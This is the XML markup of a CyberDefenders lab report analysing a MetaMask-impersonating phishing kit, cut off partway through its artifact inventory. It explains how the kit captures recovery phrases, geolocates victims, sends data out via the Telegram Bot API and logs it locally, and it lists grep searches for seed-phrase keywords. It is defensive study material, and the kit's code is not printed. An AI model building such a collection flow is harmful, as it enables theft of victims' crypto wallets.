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GrabThePhisher Static Analysis Investigation Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="17365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>CyberDefenders Phishing Kit Analysis</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="6263640" cy="3525171"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="05-grabthephisher-attack-flow.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6263640" cy="3525171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FigureCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Investigation overview and reconstructed data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shd w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4997"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Alaa Zahra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4997"/>
            <w:shd w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4997"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CyberDefenders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4997"/>
            <w:shd w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Analysis type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4997"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Static source-code and artifact analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4997"/>
            <w:shd w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4997"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Authorized training environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Public report note: Telegram bot credentials and chat identifiers are redacted. The original evidence was preserved separately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The supplied artifact was a cryptocurrency phishing kit that impersonated MetaMask and requested a victim's 12-word recovery phrase. Static analysis showed that client-side JavaScript submitted the phrase to a PHP handler. The handler combined the phrase with the victim's IP address and browser information, used Sypex Geo to derive country and city information, sent the assembled record through the Telegram Bot API, and appended the phrase to a local log file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Three recovery-phrase records were present in the supplied log. The final record was assessed as the most recently stored entry because the handler used append-only file behavior. A developer-style alias was present in a source-code comment, but it is treated only as an attribution clue and not as verified identity evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Scope and Safety Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The ZIP archive and extracted files were treated as untrusted evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Analysis was performed inside a Kali Linux virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The phishing page was not opened in a browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The PHP handler was not executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>No request was sent to the embedded Telegram bot or external infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Sensitive access values are redacted from this public report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Key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312"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Impersonated wallet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MetaMask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Collection handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>metamask.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Backend language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IP enrichment service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sypex Geo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Stored victim records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exfiltration medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Telegram Bot API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Local storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>log/log.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attribution evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6624"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Developer alias in a code comment; identity unverified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence Handling and Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The investigation followed a static-analysis workflow intended to preserve the evidence and avoid activating any embedded behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Inventory all extracted files before focusing on individual artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Locate high-value strings in the victim-facing page using targeted text searches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Display the surrounding source lines to retain context and line references.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Trace the submitted value from the browser-side form to the server-side handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Inspect enrichment, exfiltration, and storage functions without executing them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Validate stored-record counts and ordering against the handler's write behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>Separate verified facts from inference and attribution limitations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:shd w:fill="F1F3F5"/>
      </w:pPr>
      <w:r>
        <w:t>find . -type f | sort</w:t>
        <w:br/>
        <w:br/>
        <w:t>grep -niE "wallet|seed|phrase|recovery|mnemonic|title" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ./temp_extract_dir/pankewk/metamask/index.html</w:t>
        <w:br/>
        <w:br/>
        <w:t>nl -ba ./temp_extract_dir/pankewk/metamask/index.html \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | sed -n '22525,22572p'</w:t>
        <w:br/>
        <w:br/>
        <w:t>nl -ba ./temp_extract_dir/pankewk/metamask/metamask.php \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | sed -n '1,220p'</w:t>
        <w:br/>
        <w:br/>
        <w:t>nl -ba ./temp_extract_dir/pankewk/log/log.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="6126480" cy="3344958"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="01-phishing-kit-file-structure.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6126480" cy="3344958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FigureCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1  Inventory of extracted phishing-kit artifacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Artifact Inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The extracted project combined victim-facing content, copied development assets, backend collection logic, and retained victim data. Not every file in the kit was malicious by itself; investigative priority was based on behavior and data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376"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2376"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>metamask/index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4032"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Victim-facing page and JavaScript submission logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
